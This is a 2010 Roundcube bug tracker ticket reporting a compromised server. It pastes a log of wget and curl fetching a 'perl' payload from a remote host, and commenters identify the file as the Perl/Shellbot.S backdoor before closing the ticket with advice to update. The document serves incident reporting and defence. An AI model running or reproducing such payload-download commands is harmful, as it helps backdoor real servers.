Opened 3 years ago
Closed 3 years ago
#1486465 closed Bugs (worksforme)
roundcube perl attack
| Reported by: | student7 | Owned by: | |
|---|---|---|---|
| Priority: | 1 - Highest | Milestone: | 0.4-beta |
| Component: | Security | Version: | 0.3.1 |
| Severity: | normal | Keywords: | |
| Cc: | byron@… |
Description
--2010-01-29 15:04:31-- http://66.246.218.60/roundcube/logs/perl
Connecting to 66.246.218.60:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39904 (39K) [text/plain]
Saving to: `perl'
0K .......... .......... .......... ........ 100% 209K=0.2s
2010-01-29 15:04:31 (209 KB/s) - `perl' saved [39904/39904]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
M 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0M100 39904 100 39904 0 0 90986 0 --:--:-- --:--:-- --:--:-- 109k
sh: fetch: command not found
perl: no process found
Change History (3)
comment:1 Changed 3 years ago by alec
- Milestone changed from later to 0.4-beta
- Priority changed from 5 to 1 - Highest
comment:2 Changed 3 years ago by glob
- Cc byron@… added
that's the Perl/Shellbot?.S backdoor.
it uses an exploit in SQuery to propagate (http://osvdb.org/show/osvdb/24408).
comment:3 Changed 3 years ago by alec
- Resolution set to worksforme
- Status changed from new to closed
This perl script could be also uploaded using security issues in old Roundcube versions. Because Roundcube at http://66.246.218.60/roundcube doesn't looks to me as 0.3, so you just should do an update.
Someone has hacked your server, but the log doesn't show how. Are you using 0.3.1?